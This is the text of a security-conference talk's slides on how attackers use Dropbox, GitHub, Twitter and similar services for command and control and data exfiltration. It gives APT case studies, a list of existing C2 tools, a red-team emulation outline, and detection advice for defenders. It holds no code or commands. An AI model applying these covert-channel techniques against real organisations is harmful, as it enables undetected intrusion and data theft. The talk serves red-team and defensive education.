Abusing 3rd-Party Services For Command
And Control
Vince Trune
whoami
Vince Trune - @Truneski
 Electronics Engineer from Jomo Kenyatta University of
Agriculture and technology .
 Red-Teamer and Freelance Penetration Tester.
 First time AfricaHackon conference presenter (be nice)
 More into Threat, Emulation and Replication.
About
 This talk about how attackers can abuse trusted 3rd party
services and file sharing services to your detriment and profit.
Intro
 3rd party services include social media sites like Twitter and
Facebook
 File sharing sites like DropBox and Google docs.
3rd Party Advantages

Social media services are now a necessity for any marketing
team, PR team and by extension the technical teams.

File Sharing sites are free, easy to use, extremely fast and can be
used in conjunction with social media sites.

Almost whitelisted and unmonitored traffic in most
organizations.
Why Do This Talk
 Already being used by Advanced Persistent Threats (APTs) in the
wild.
 Give a technical edge to our Red-Team OPs.
(Offense fuels Defense)
 More fun and a tremendous learning experience.
Advanced Persistent Threats
Attacker Infrastructure
• Paid Cloud Services
• Digital ocean, AWS, Azure, etc..
• Utilize previously compromised
infrastructure
• Hack people to hack other people
• Utilize 3rd party services and file sharing
sites
• Utilize techniques to bend traffic in
“legitimate” ways
Real World Case Studies

Real World Case Studies
Dropbox: Operation BugDrop

Targeted Ukraine on a Grand Scale.

Prime Motivation for early release of Invoke-DBC2.

DropBox for Data Exfiltration and Storing C2 Plugins.
Github: WINNT GANG



Github for Command & Control .
Financially motivated and engaged in active Cyber-Espionage.
Mostly uses Plug-X RAT for its attacks.
Twitter: APT 29



Uses Twitter to control their malware (Hammertoss)
Stego over Github for data Exfiltration.
Russian State Sponsored Probably.
Current Tools
• GCat - Shell over gmail
• Empire 2.0 - Able to do custom C2 modules including 3rd party
apps
• DropSmack - C2 over Dropbox sync folder
• Instegogram - C2 over Instagram with stego
• DropBoxC2 - C2 Over Dropbox
• Invoke-DBC2 – C2 over Powershell and DropBox
Threat Emulation & Replication: My Approach
Adversary Emulation Features
 Uses API for all interaction with the C2 services.
 AES-128 For Encryption of Communications.
 PowerShell for client-side(victim) code: Runs in memory,
Powerful and Wide Scalability.
Limitations



Hard to model and truly emulate the adversarial tactics and
techniques
Requires considerable skill for a small Red Team
Our Proof Of Concepts are easily defeated.
Demos
Defend The Land
 Invest in your Security Team
 Endpoint Based: Binary Signature Heuristics(AV)
 Network Baseline: Timestamp Analysis & Beaconing
• Establish a Baseline for nodes in the environment
 Network & Process Correlation & EventLogging
• Should Powershell be calling out to Twitter’s API
Data Sources to Consider
• Network
• PCAP / Span off of core switch and egress
• DNS logs or passive DNS
• Netflow
• Proxy logs
• Internal Threat Intel (Sandbox Detonation)
• Endpoint (eventing is best)
• Process listing events
• Network connection events
• DNS lookup events
• Service add/removal events
• Program install / uninstall events
Conclusion
 APTs are creative and will find ways to use
your weaknesses
 3rd party services make for quick and easy C2
or exfiltration vectors
 Detecting the use of 3rd party services for C2
is difficult
• Requires foundational network collection
• Attacker activity will often come in a series
of behaviors to create a pattern
• Need to look for anomalous activity
References
Questions